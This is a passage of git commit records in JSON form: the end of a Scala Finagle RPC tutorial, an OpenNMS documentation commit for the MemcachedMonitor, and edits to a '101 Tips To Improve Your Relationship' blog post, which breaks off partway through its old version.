*\/ def client[I, O](host: String, timeout: Duration = 3.second) (implicit ic: Codec[I], oc: Codec[O]) = ClientBuilder() \n .name(\"client\") \n .codec(codecFactory[I, O]) \n .hosts(host) \n .timeout(timeout) \n .build()\n }\n----\n\nDefine our simple service\n[scala,source]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Future\n\nclass IntegerService extends Service[Int, Int]{ var count = 0 override def apply(request: Int): Future[Int] = { Future.value(count + request) }\n}\n----\n\nRun a server\n\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Awaitimport scodec.codecs.implicits.{ implicitIntCodec => _, _ }\n\nobject Server { def main(args: Array[String]): Unit = { implicit val intgerCodec = \nscodec.codecs.uint8\n\n val service: Service[Int, Int] =\n new IntegerService \n val server = IntegerServerAndClient.server[Int, Int](9191)(service) Await.ready(server) \n }\n }\n----\nRun a client\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Awaitimport scodec.codecs.implicits.{ implicitIntCodec => _, _ }\n\nobject Client { def main(args: Array[String]): Unit = {\n\n implicit val intgerCodec = scodec.codecs.uint8\n\n \/\/define a client \n val client: Service[Int, Int] = IntegerServerAndClient.client[Int, Int](\"localhost:9191\") \/\/define a request \n val request = 4 \n \/\/apply request on the client \n val response = client(request) \n \/\/print response response.foreach(rep => println(s\"This is response $rep\")) \n Await.result(response) \n }\n }\n----\n## Conclusion\nFinagle is a very flexible asychronous, protocol-agnostic RPC framework. It can help you to build high performance micro service with any protocol. It is worth to take a look at Finch the web framework based on Finagle. 
You can find more detail introduction from https:\/\/blog.twitter.com\/2011\/finagle-a-protocol-agnostic-rpc-system[Twitter blog] and more detailed example from http:\/\/twitter.github.io\/scala_school\/searchbird.html[Twitter scala school].\n\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6ba70d1ba712e515651112dd1a0464c24afe3ca3","subject":"NMS-6672: Documentation MemcachedMonitor","message":"NMS-6672: Documentation MemcachedMonitor\n\n- Added generic description\n- Added table with collected metrics\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/MemcachedMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/MemcachedMonitor.adoc","new_contents":"\n=== MemcachedMonitor\n\nThis monitor allows you to monitor link:http:\/\/memcached.org[Memcached], a distributed memory object caching system.\nTo monitor the service availability, the monitor tests if the _Memcached_ statistics can be requested.\nThe statistics are processed and stored in RRD files.\nThe following metrics are collected:\n\n.Collected metrics using the MemcachedMonitor\n[options=\"header, autowidth\"]\n|===\n| Metric | Description\n| _uptime_ | Seconds the _Memcached_ server has been running since the last restart.\n| _rusageuser_ | User time seconds for the server process.\n| _rusagesystem_ | System time seconds for the server process.\n| _curritems_ | Number of items in this server's cache.\n| _totalitems_ | Number of items stored on this server.\n| _bytes_ | Number of bytes currently used for caching items.\n| _limitmaxbytes_ | Maximum configured cache size.\n| _currconnections_ | Number of open connections to this _Memcached_.\n| _totalconnections_ | Number of successful connect attempts to this server since start.\n| _connectionstructure_ | Number of internal connection handles currently held by the server.\n| _cmdget_ | Number of _GET_ commands received since server startup.\n| _cmdset_ | Number of _SET_ commands received since server startup.\n| _gethits_ | Number of successful _GET_ commands (cache hits) since startup.\n| _getmisses_ | Number of failed _GET_ requests, because nothing was cached.\n| _evictions_ | Number of objects removed from the cache to free up memory.\n| _bytesread_ | Number of bytes received from the network.\n| _byteswritten_ | Number of bytes sent to the network.\n| _threads_ | Number of threads used by this server.\n|===\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.netmgt.poller.monitors.MemcachedMonitor`\n| Remote Enabled | true\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the MemcachedMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `timeout` | Timeout in milliseconds for Memcached connection establishment. | optional | `3000`\n| `retry` | Number of attempts to establish the Memcached connection. | optional | `0`\n| `port` | TCP port connecting to Memcached. 
| optional | `11211`\n|===\n\n==== Examples\n\nThe following example shows a configuration in the 'poller-configuration.xml'.\n\n[source, xml]\n----\n<service name=\"Memcached\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"port\" value=\"11211\" \/>\n <parameter key=\"retry\" value=\"2\" \/>\n <parameter key=\"timeout\" value=\"3000\" \/>\n <parameter key=\"rrd-repository\" value=\"\/opt\/opennms\/share\/rrd\/response\" \/>\n <parameter key=\"ds-name\" value=\"memcached\" \/>\n <parameter key=\"rrd-base-name\" value=\"memcached\" \/>\n<\/service>\n\n<monitor service=\"Memcached\" class-name=\"org.opennms.netmgt.poller.monitors.MemcachedMonitor\" \/>\n----\n","old_contents":"\n=== MemcachedMonitor\n\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.netmgt.poller.monitors.MemcachedMonitor`\n| Remote Enabled | true\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the MemcachedMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `timeout` | Timeout in milliseconds for Memcached connection establishment. | optional | `3000`\n| `retry` | Number of attempts to establish the Memcached connnection. | optional | `0`\n| `port` | TCP port connecting to Memcached. | optional | `11211`\n|===\n\n==== Examples\n\n[source, xml]\n----\n<service name=\"SSH\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"1\"\/>\n <parameter key=\"banner\" value=\"SSH\"\/>\n <parameter key=\"client-banner\" value=\"OpenNMS poller\"\/>\n <parameter key=\"timeout\" value=\"5000\"\/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\"\/>\n <parameter key=\"rrd-base-name\" value=\"ssh\"\/>\n <parameter key=\"ds-name\" value=\"ssh\"\/>\n<\/service>\n<monitor service=\"SSH\" class-name=\"org.opennms.netmgt.poller.monitors.SshMonitor\"\/>\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c1725848dc4353831067f0b73b60c2f49b2f2604","subject":"Update 2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","message":"Update 2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","new_file":"_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","new_contents":"= 101 Tips To Improve Your Relationship \n:hp-image: https:\/\/user-images.githubusercontent.com\/19504323\/34144297-e38e3492-e4cb-11e7-939e-27d271d97f4d.png\n:published_at: 2017-07-21\n:hp-tags: tips, relationship\n:hp-alt-title: 101 Tips To Improve Your Relationship\n:linkattrs:\n\n\nBeing part of a couple is hard, but the best relationship tips are really all about maintenance. You\u2019ve got to keep things fresh, find time for each other, and come up with ways to navigate the tricky ups and downs every partnership faces. That all sounds a lot easier than it really is, so we\u2019ve come up with 101 ways to make your relationship even better.\n\nFrom how to deal with jealousy to how to get over a potentially deadly lull, we\u2019ve got 101 relationship tips that you can start implementing right now.\n\nAlso Read: http:\/\/amzn.to\/2CCdNo4[How to Be an Adult in Relationships: The Five Keys to Mindful Loving^]\n\n1. 
Listen.\nIt might sound obvious, but when you really allow yourself to listen\u2014and ask questions about\u2014what your partner says, it not only leads to better conversations, but also better communication.\n2. Take a few days apart.\nMissing each other is a great way to reconnect. Try grabbing some girlfriends for an overnight or a weekend getaway every few months.\n3. Find a support team.\nHave a handful of great friends or family members you can call so your significant other doesn\u2019t have to hear every small grievance going on in your life.\n4. Put away your phones.\nOne of the biggest relationship tips is to give your undivided attention when your partner is speaking. It\u2019s one of the most important things you can do.\n5. Volunteer together.\nGiving back is a great way to keep perspective of how great your relationship is, and how lucky you both are.\n6. Create a checklist.\nJot down new and fun things you want to accomplish for a day as a duo.\n7. Talk to couples over 65 years old.\nGet relationship tips from them, and see what you can take away to apply to your relationship.\n8. Stop and appreciate all that your relationship is this very second.\nStop living for what it can be. This person is choosing to be in your life every day, not every day in the future.\n9. Revisit the questions you asked in the beginning.\nWhat are you hoping to accomplish in the next year? What are you scared of? These answers change, so we need to keep asking these questions.\n10. Find 10 things you really love about them and tell them.\nGuys need confidence boosters, too!\n11. Stop nagging.\nSeriously, stop. Take a step back and figure out the big things about your partner that truly bother you, and approach them from a place of concern and support instead of nitpicking for sport. That\u2019ll get you nowhere.\n12. Get over needing to be right.\nLearning to say \u201cI was wrong\u201d is a skill worth learning.\n13. Take care of yourself.\nNo relationship can be successful if you don\u2019t feel good about yourself, both inside and out.\n14. Know what you need and then ask for it.\nYou\u2019re dating a human, not a magical psychic.\n15. Take a class.\nIt\u2019s proven that couples who learn together connect deeper. Find some common ground (cooking? art? science?) and go from there.\n16. Stop complicating things that aren\u2019t complicated enough.\nDon\u2019t pull a Carrie Bradshaw during the Aiden years: If you bemoan the fact that your relationship is going too well, you might need to revisit why you\u2019re constantly seeking out drama.\n17. Assume that if something was said that hurt your feelings, it wasn\u2019t intended that way.\nWhy would they want to upset you or hurt you? Give your partner the benefit of the doubt, but if it\u2019s really bothering you, don\u2019t be afraid to bring it up.\n18. Write notes.\nWhether you have study hall together or live together, handwritten notes are personal touches in today\u2019s highly digital world.\n19. Pitch in.\nHelp each other with chores and other necessary, if banal, activities \u2014 cooking, cleaning, re-organizing, etc. Not doing them if you live together can create tension, and always doing them can create unfair expectations. Act as a team of equals.\n20. Disconnect.\nStep away from the laptop during quality time. Everything on the Internet will still be there later.\n
21. Allow things to be what they are.\nSometimes bad days and bad moods happen. Don\u2019t go crazy trying to make everything better. Just be supportive and loving, because just being there at the end of a bad day can make it better for both of you.\n22. Create mini-traditions.\nCreating small rituals can really help hold up a couple because they become \u201cyour thing.\u201d Whether it\u2019s a fancy night out during the holiday season, or watching a certain show every week, these are things that\u2019ll give you both something to look forward to, and it\u2019ll bring you closer together.\n23. Be an open book.\nThey can either deal with it or they can\u2019t, but if you can\u2019t be your most honest self with this person, it\u2019ll come out eventually.\n24. Compliment, and often.\nYou\u2019re there to make each other feel like your best selves, so let the genuine praise flow freely. Like his outfit? Tell him! Like her hair today? Let her know!\n25. Make promises that you really can keep.\nSay things that you want to follow through with out loud. It\u2019ll make you work harder to make them happen. Having\u2014and setting\u2014levels of reasonable expectations for your relationship is a healthy way to keep it strong.\n26. Acknowledge positive actions.\nWhen you and your partner see positive actions, solutions, or behavior in one another, acknowledge it and remind each other to keep it up.\n27. Establish genuine connections with the other\u2019s friends and family.\nHang out together with both of your friends and family. This is the stuff that makes the world go \u2019round, people!\n28. Pay attention to the tiny things that bother your partner, and if it\u2019s painless for you, work to change them.\nWe\u2019re not talking changing your laugh or your style, but if you know that your partner really hates it when you leave the kitchen counter cluttered, try to make a point of clearing it off before he gets home. It\u2019s an easy enough thing to do and it makes their day better, so why not?\n29. Never, never forget to ask about the other person\u2019s day.\nIt\u2019s such an easy slight to avoid!\n30. Only one person gets to have the bad day.\nIf your partner\u2019s day sucked and yours was just \u201ceh,\u201d let them have the pity (and the control of the remote, and the choice of take-out). If it\u2019s you, announce it early and let them know you need the support. If it\u2019s a toss-up, trade stories about why your days were so awful and you\u2019ll end up laughing while trying to figure out who wins.\n31. Small gifts go a long way.\nBringing home a pack of their favorite candy\/magazine\/book by a favorite author never gets old.\n32. Graham Parsons has a song lyric that says \u201cI just want to hold you, I don\u2019t want to hold you down.\u201d\nLet that be your motto when you\u2019re giving your partner advice.\n33. Log onto Instagram and like all their photos.\nJust because.\n34. Plan a date where you revisit the spot you went on your first date.\nRemember all the amazing things that brought you from then to now.\n35. Go on a walk together somewhere beautiful.\nAnd don\u2019t forget to turn off your cell phones.\n36. Surprise them with dinner.\nOne unexpected night, surprise your partner with a home-cooked meal, and a nicely-set table.\n37. Review your top five favorite funny things your partner has done.\nBecause your partner is funny! That\u2019s part of why you like them.\n38. Go to a yoga class together.\nOr another exercise class together. Your body and relationship will thank you!\n
39. Go on a road trip, even if you\u2019re not going anywhere far.\nIt\u2019s nice to get out of town sometimes.\n40. Pick up a six-pack of toilet paper or (even better) a six-pack of beer.\nWithout even being asked.\n41. Keep the surprises coming.\nThink of your relationship as a creative challenge. To keep the romance fresh, come up with new date ideas, new sex positions, and new ways to demonstrate your love.\n42. Plan small outings.\nWhether it\u2019s brunch this weekend, or a trip to a new neighborhood.\n43. Make out.\nKissing is something that is often set to the side the longer a couple has been together. Out of the blue one day, initiate a high-school style make-out session.\n44. Let it go.\nDon\u2019t hold onto that thing your lover said or did six months ago and bring it up each time you get mad at him. Do both of you a favor and let it go.\n45. Don\u2019t interrupt.\nEven if what you think your significant other is saying is uninteresting, don\u2019t bulldoze over his or her words. Being able to listen to each other\u2014even when the details are mundane\u2014is important.\n46. Say thanks.\nLet him know that you notice the little things he does by saying thank you for routine tasks like walking the dog or picking up groceries.\n47. Cook a meal together.\nCome up with a menu, shop, and prepare the food together.\n48. Have fun with hypotheticals.\nConversation can become routine. Break from the ordinary and have a silly dinner conversation made entirely of imaginary situations\u2014for example, \u201cIf you were on an island and could only bring five movies, which movies would you bring?\u201d\n49. Keep a couple\u2019s journal.\nWrite down your desires and fantasies and leave them out for your significant other to find\u2014encourage him to write back.\n50. Agree to disagree.\nThis is one of the most important relationship tips, as you both have strong opinions and therefore some issues will never be resolved. Respect each other\u2019s point of view and agree not to argue about the same issue, unless it\u2019s something that could get in the way of your future, like politics, religion, or values.\n51. Set goals.\nIn addition to setting life goals, set relationship goals. For example: We aim to spend more time together outside rather than in front of the TV.\n52. Take responsibility for your own happiness.\nLove is grand, but at the end of the day the only person we can hold accountable for our happiness is ourselves. Do volunteer work, exercise, host dinner parties\u2014find what satisfies you, and go from there.\n53. Learn each other\u2019s conflict habits.\nMake an effort to understand you and your partner\u2019s conflict habits so you can break bad patterns and find a middle ground that\u2019s productive and respectful.\n54. Define love.\nWhile \u201cI love you,\u201d is an extraordinary thing to say\u2014and an equally wonderful thing to hear\u2014it means something different to each person. Tell each other what you\u2019re saying when you declare these magic words. It could be a list of many sentiments such as, \u201cI would do anything for you,\u201d and \u201cI trust you completely.\u201d\n55. Take turns planning date nights that are actual, real, capital-D Dates.\nTakeout and TV doesn\u2019t count.\n
56. Approach your partner\u2019s issues in the context of how they affect the relationship.\nIt\u2019ll reduce the chances they feel personally attacked for no reason.\n57. Cuddle.\nMake ample time for cuddling. Whether or not it leads to sex, physical affection is important.\n58. Don\u2019t forget to say \u201cI Like You.\u201d\nThe greatest compliment you can give a partner (especially a long-term partner) is reminding them that not only do you love them, but you also like them.\n59. Have a spontaneous midday tryst.\nSend him a text as he\u2019s about to go on his lunch break, take time out on a Saturday, however you want to play it.\n60. Travel together.\nSeeing the world together creates amazing shared memories.\n61. Tell them EXACTLY why you love and appreciate them as often as possible.\n\u201cI love you\u201d is good. \u201cI love the way you make sure no one ever feels left out\u201d is even better.\n62. Stay out of their family drama.\nIt\u2019s so not worth it.\n63. Really look at each other.\nWe spend a lot of time with our partners but sometimes we don\u2019t actually see them. Take the time to actually look into one another\u2019s eyes.\n64. Give each other a pet name.\nIt may be super annoying to other people (and you may want to reserve it for when you\u2019re in private), but a pet name can add an extra layer of intimacy to your relationship.\n65. Spend time alone.\nAs important as it is to spend quality time with your partner, it\u2019s equally necessary that you develop a good sense of who you are without them. Kahlil Gibran said \u201clet there be spaces in your togetherness,\u201d and we stand by that.\n66. Eat at the dinner table.\nDo you eat in front of the TV? Try actually sitting down to a meal with your partner at an actual table. You may find it a welcome change.\n67. In fact, turn the TV off all together.\nWhy not try instituting a TV-free night in your apartment? See what else happens when you spend time together sans the talking box.\n68. Ask for clarity.\nIf you\u2019re confused about what your partner means, ask for clarity instead of making assumptions about what they mean. Use an open phrase like, \u201cWhat did you mean when you said, \u2018xyz\u2019?\u201d rather than instantly going on the offensive.\n69. Own your feelings.\nPassive-aggressiveness is a total relationship killer. Quash it by practicing assertiveness and clarity. Saying \u201cI\u2019m fine\u201d when you\u2019re not fine is a prime example of not owning your feelings.\n70. Communicate in a constructive way.\nFor instance, we think the phrase construction \u201cWhen ____ happens, it makes me feel ____\u201d can be particularly helpful.\n71. Take an interest in what your partner\u2019s into.\nHe\u2019s into chess, or cheese, or cheese that looks like a chess board (maybe?). You don\u2019t have to love it, but give it a shot. You may surprise yourself!\n72. But also cultivate your own interests.\nYou and your partner don\u2019t need to have everything in common. Seriously. That\u2019s actually really annoying.\n73. Let your partner teach you something they\u2019re good at, and vice versa.\nEveryone\u2014everyone\u2014loves the feeling of being able to teach somebody they like about something they\u2019re good at.\n74. Bring your groups together.\nIt\u2019s easy to silo your social lives and create separate his-and-hers worlds, but bringing your friends, siblings, or colleagues together can be a fun thing.\n
75. Don\u2019t forget about sex.\nWork, stress, and other responsibilities can get in the way of your sex life, and before you know it, you\u2019ve gone a month without getting busy. Don\u2019t let this happen. Schedule it in if you have to, just make sure to connect in an intimate way.\n76. But do forget about jealousy.\nJealousy can be completely toxic to relationships, so keep yours in check. If you\u2019re always jealous, figure out if it\u2019s your personal issue, or if your partner is doing things to appear less trustworthy.\n77. Cultivate your appreciation.\nSpread what you love about your partner. Practice your appreciation by sharing it with others\u2014not in a gross, gratuitous, braggy way, but don\u2019t miss out on the opportunity to tell others why your partner is awesome. In turn, it\u2019ll remind you why you like them, too.\n78. Laugh. In bed.\nSex should be sexy, sure. But it should also be fun. Don\u2019t be afraid to have a laugh if things take a turn for the ridiculous.\n79. Let yourself be taken care of when you need it.\nWe all need special care on occasion. Let your partner help you when you\u2019re feeling sick or down. It doesn\u2019t mean you\u2019re not strong, it just means you\u2019re willing to accept help.\n80. Check your competitive edge.\nYou and your partner are there to support each other, not compete with one another. If you find yourself comparing yourself or competing with your significant other, check your behavior. That\u2019s not healthy!\n81. Have a bed day.\nAllow yourselves a totally lazy day where you lie around and do nothing of note except enjoy each other\u2019s company.\n81. Be kind to yourself.\nThe best way to develop positive patterns in a relationship is to develop them first with yourself. Don\u2019t be so critical of yourself, and you\u2019ll set a good example for your relationship.\n82. Express gratitude for the little things, and for specific things.\nBig gestures are great, but it\u2019s great to recognize the little things your partner does that make you feel happy and loved, too.\n83. Date like you dated in high school.\nAsk each other out. Get excited. Take forever to get ready. Make out. Repeat.\n84. Be present.\nWe can ruin a perfectly great relationship by focusing too much on the past, or worrying too much about what may happen in the future. Learn to enjoy where you are, and who you\u2019re with right now.\n85. Don\u2019t try to control.\nA relationship isn\u2019t a battle of wills, it\u2019s two people who are choosing to be together, so don\u2019t treat your partner like they\u2019re some kind of wild animal you\u2019re trying to tame.\n86. Embrace your common goals.\nWhat is it that you both want to accomplish? Can you support each other to reach those goals? That\u2019ll be a big piece of what will hold you two together as a couple in the long run.\n87. Have a cultural experience together.\nSee a movie, a play, or an art exhibition together \u2014 and then talk about them afterward. You may be pleasantly surprised by how differently\u2014or similarly\u2014you viewed things.\n88. Go on a long bike ride.\nBike rides are deeply freeing experiences, and it\u2019s nice to be able to do that with someone you love.\n89. Try talking on the phone.\nYes, we know this sounds crazy, but phone calls allow a different sort of communication than texting, or even talking in person, will. You may actually deepen your connection through a phone chat.\n90. Make a mix for each other.\n
It\u2019s cute, romantic and something out of a rom-com. Although in this day and age, you might want to make a Spotify playlist rather than a mixed CD.\n91. Keep yourself in check.\nWe spend so much time paying attention to how our partners behave, but take a second to notice how you\u2019re acting \u2014 especially if you\u2019re fired up or in a bad mood. And then give yourself a second to\u2026\n92. \u2026 Breathe.\nBefore you say something you don\u2019t mean, take a breath and ask yourself if that\u2019s really the way you want to move forward. Chances are, taking a second out will help you recalibrate and think of a more constructive way of handling the situation.\n93. Help each other.\nThis one is so easy, but if your partner\u2019s having a hard time with something \u2014 whether it\u2019s doing their taxes or organizing their closet \u2014 offer a helping hand.\n94. Be their biggest cheerleader.\nIf your partner\u2019s accomplished something amazing, let them know it, and let them shine.\n95. In your craziest moments of frustration or anger, remember what it is that you like about them the most.\nThere\u2019s a reason you\u2019re with them after all, right?\n96. Remember that a relationship should always make your life better on the whole, not worse.\nAnd aim to make sure yours is doing just that. If it\u2019s not, it may be time to reconsider.\n97. Enjoy the quiet moments you spend with each other.\nNot everything has to be a big adventure or a big deal. Sometimes the best times are the quiet, unplanned things you do together.\n98. Make sure you\u2019re taking care of yourself.\nDon\u2019t let yourself get so invested in your partner that you forget to take care of yourself.\n99. Let go of the past.\nWe often let our past hurts dictate our present. Learn to let go of past resentments and fears in order to live more fully with your partner right now.\n100. Touch each other often.\nSimple touch builds intimacy \u2014 especially non-sexual touch. It\u2019s a non-verbal way of saying, \u201cyes, I\u2019m here for you, and I care about you\u201d and it helps reinforce your emotional bond.\n101. The best relationships are ones in which both partners feel like the luckiest person in the world.\nFind ways to communicate that and foster that feeling in each other, and you\u2019ll be good.\n\n","old_contents":"= 101 Tips To Improve Your Relationship \n:hp-image: https:\/\/user-images.githubusercontent.com\/19504323\/34144297-e38e3492-e4cb-11e7-939e-27d271d97f4d.png\n:published_at: 2017-07-21\n:hp-tags: tips, relationship\n:hp-alt-title: 101 Tips To Improve Your Relationship\n:linkattrs:\n\n\nBeing part of a couple is hard, but the best relationship tips are really all about maintenance. You\u2019ve got to keep things fresh, find time for each other, and come up with ways to navigate the tricky ups and downs every partnership faces. That all sounds a lot easier than it really is, so we\u2019ve come up with 101 ways to make your relationship even better.\n\nFrom how to deal with jealousy to how to get over a potentially deadly lull, we\u2019ve got 101 relationship tips that you can start implementing right now.\n\nAlso Read: http:\/\/amzn.to\/2CCdNo4[How to Be an Adult in Relationships: The Five Keys to Mindful Loving^]\n\n1. Listen.\nIt might sound obvious, but when you really allow yourself to listen\u2014and ask questions about\u2014what your partner says, it not only leads to better conversations, but also better communication.\n2. Take a few days apart.\nMissing each other is a great way to reconnect. 
Try grabbing some girlfriends for an overnight or a weekend getaway every few months.\n3. Find a support team.\nHave a handful of great friends or family members you can call so your significant other doesn\u2019t have to hear every small grievance going on your life.\nMORE: 9 Things Every Woman Deserves in a Relationship\n4. Put away your phones.\nOne of the biggest relationship tips is to give your undivided attention when your partner is speaking. It\u2019s is one of the most important things you can do.\n5. Volunteer together.\nGiving back is a great way to keep perspective of how great your relationship is, and how lucky you both are.\n6. Create a checklist.\nJot down new and fun things you want to accomplish for a day as a duo.\n7. Talk to couples over 65 years old. \nGet relationship tips from them, and see what you can take away to apply to your relationship.\n8. Stop and appreciate all that your relationship is this very second.\nStop living for what it can be. This person is choosing to be in your life every day, not every day in the future.\n9. Revisit the questions you asked in the beginning.\nWhat are you hoping to accomplish in the next year? What are you scared of? These answers change, so we need to keep asking these questions.\n10. Find 10 things you really love about them and tell them. \nGuys need confidence boosters, too!\n11. Stop nagging. \nSeriously, stop. Take a step back and figure out the big things about your partner that truly bother you, and approach them from a place of concern and support instead of nitpicking for sport. That\u2019ll get you nowhere.\n12. Get over needing to be right. \nLearning to say \u201cI was wrong\u201d is a skill worth learning.\n13. Take care of yourself. \nNo relationship can be successful if you don\u2019t feel good about yourself, both inside and out.\n14. Know what you need and then ask for it.\nYou\u2019re dating a human, not a magical psychic.\n15. Take a class.\nIt\u2019s proven that couples who learn together connect deeper. Find some common ground (cooking? art? science?) and go from there. \n16. Stop complicating things that aren\u2019t complicated enough.\nDon\u2019t pull a Carrie Bradshaw during the Aiden years: If you bemoan the fact that your relationship is going too well, you might need to revisit why you\u2019re constantly seeking out drama.\n17. Assume that if something was said that hurt your feelings, it wasn\u2019t intended that way.\nWhy would they want to upset you or hurt you? Give your partner the benefit of the doubt, but if it\u2019s really bothering you, don\u2019t be afraid to bring it up.\n18. Write notes.\nWhether you have study hall together or live together, handwritten notes are personal touches in today\u2019s highly digital world. \n19. Pitch in.\nHelp each other with chores and other necessary, if banal, activities \u2014 cooking, cleaning, re-organizing, etc. Not doing them if you live together can create tension, and always doing them can create unfair expectations. Act as team of equals.\n20. Disconnect.\nStep away from the laptop during quality time. Everything on the Internet will still be there later.\nMORE: The Best Short-Lived Celebrity Relationships of 2016\n21. Allow things to be what they are.\nSometimes bad days and bad moods happen. Don\u2019t go crazy trying to make everything better. Just be supportive and loving, because just being there at the end of a bad day can make it better for both of you.\n22. 
Create mini-traditions.\nCreating small rituals can really help hold up a couple because they become \u201cyour thing.\u201d Whether it\u2019s a fancy night out during the holiday season, or watching a certain show every week, these are things that\u2019ll give you both something to look forward to, and it\u2019ll bring you closer together.\n23. Be an open book.\nThey can either deal with it or they can\u2019t, but if you can\u2019t be your most honest self with this person, it\u2019ll come out eventually.\n24. Compliment, and often.\nYou\u2019re there to make each other feel like your best selves, so let the genuine praise flow freely. Like his outfit? Tell him! Like her hair today? Let her know!\n25. Make promises that you really can keep.\nSay things that you want to follow through with out loud. It\u2019ll make you work harder to make them happen. Having\u2014and setting\u2014levels of reasonable expectations for your relationship is a healthy way to keep it strong.\n26. Acknowledge positive actions.\nWhen you and your partner see positive actions, solutions, or behavior in one another, acknowledge it and remind each other to keep it up.\n27. Establish genuine connections with the other\u2019s friends and family.\nHang out together with both of your friends and family. This is the stuff that makes the world go \u2019round, people!\n28. Pay attention to the tiny things that bother your partner, and if it\u2019s painless for you, work to change them. \nWe\u2019re not talking changing your laugh or your style, but if you know that your partner really hates it when you leave the kitchen counter cluttered, try to make a point of clearing it off before he gets home. It\u2019s an easy enough thing to do and it makes their day better, so why not?\n29. Never, never forget to ask about the other person\u2019s day. \nIt\u2019s such an easy slight to avoid!\n30. Only one person gets to have the bad day. \nIf your partner\u2019s day sucked and yours was just \u201ceh,\u201d let them have the pity (and the control of the remote, and the choice of take-out). If it\u2019s you, announce it early and let them know you need the support. If it\u2019s a toss-up, trade stories about why your days were so awful and you\u2019ll end up laughing while trying to figure out who wins.\n31. Small gifts go a long way.\nBringing home a pack of their favorite candy\/magazine\/book by a favorite author never gets old.\n32. Graham Parsons has a song lyric that says \u201cI just want to hold you, I don\u2019t want to hold you down.\u201d\nLet that be your motto when you\u2019re giving your partner advice.\n33. Log onto Instagram and like all their photos.\nJust because.\n34. Plan a date where you revisit the spot you went on your first date.\nRemember all the amazing things that brought you from then to now.\n35. Go on a walk together somewhere beautiful.\nAnd don\u2019t forget to turn off your cell phones.\n36. Surprise them with dinner.\nOne unexpected night, surprise your partner with a home-cooked meal, and a nicely-set table.\n37. Review your top five favorite funny things your partner has done.\nBecause your partner is funny! That\u2019s part of why you like them.\n38. Go to a yoga class together.\nOr other exercise class together. Your body and relationship will thank you!\n39. Go on a road trip, even if you\u2019re not going anywhere far. \nIt\u2019s nice to get out of town sometimes.\n40. Pick up a six-pack of toilet paper or (even better) a six-pack of beer.\nWithout even being asked.\n41. 
Keep the surprises coming.\nThink of your relationship as a creative challenge. To keep the romance fresh, come up with new date ideas, new sex positions, and new ways to demonstrate your love.\n42. Plan small outings.\nWhether its brunch this weekend, or a trip to a new neighborhood.\n43. Make out.\nKissing is something that is often set to the side the longer a couple has been together. Out of blue one day, initiate a high-school style make-out session.\n44. Let it go.\nDon\u2019t hold onto that thing your lover said or did six months ago and bring it up each time you get mad at him. Do both of you a favor and let it go\n45. Don\u2019t interrupt. \nEven if what you think your significant other is saying is uninteresting, don\u2019t bulldoze over his or her words. Being able to listen to each other\u2014even when the details are mundane\u2014is important.\n46. Say thanks. \nLet him know that you notice the little things he does by saying thank you for routine tasks like walking the dog or picking up groceries.\n47. Cook a meal together.\nCome up with a menu, shop, and prepare the food together.\n48. Have fun with hypotheticals.\nConversation can become routine. Break from the ordinary and have a silly dinner conversation made entirely of imaginary situations\u2014for example, \u201cIf you were on an island and could only bring five movies, which movies would you bring?\n49. Keep a couple\u2019s journal. \nWrite down your desires and fantasies and leave them out for your significant other to find\u2014encourage him to write back.\n50. Agree to disagree. \nThis is one of the most important relationship tips, as you both have strong opinions and therefore some issues will never be resolved. Respect each other\u2019s point of view and agree not to argue about the same issue, unless it\u2019s something that could get in the way of your future, like politics, religion, or values.+++<div id=\"amzn-assoc-ad-362ca55c-c25e-4b62-99e7-044b18860126\"><\/div><script async src=\"\/\/z-na.amazon-adsystem.com\/widgets\/onejs?MarketPlace=US&adInstanceId=362ca55c-c25e-4b62-99e7-044b18860126\"><\/script>+++\n51. Set goals. \nIn addition to setting life goals, set relationship goals. For example: We aim to spend more time together outside rather than in front of the TV.\n52. Take responsibility for your own happiness\nLove is grand, but at the end of the day the only person we can hold accountable for our happiness is ourselves. Do volunteer work, exercise, host dinner parties\u2014find what satisfies you, and go from there.\nMORE: WTF! Taylor Swift Has Never Walked a Red Carpet with a Boyfriend\n53. Learn each other\u2019s conflict habits.\nMake an effort to understand you and your partner\u2019s conflict habits so you can break bad patterns and find a middle ground that\u2019s productive and respectful.\n54. Define love. \nWhile \u201cI love you,\u201d is an extraordinary thing to say\u2014and an equally wonderful thing to hear\u2014it means something different to each person. Tell each other what you\u2019re saying when you declare these magic words. It could be a list of many sentiments such as, \u201cI would do anything for you,\u201d and \u201cI trust you completely.\u201d\n55. Take turns planning date nights that are actual, real, capital-D Dates \nTakeout and TV doesn\u2019t count.\n56. Approach your partner\u2019s issues in the context of how they affect the relationship.\nIt\u2019ll reduce the chances they feel personally attacked for no reason.\n57. Cuddle.\nMake ample time for cuddling. 
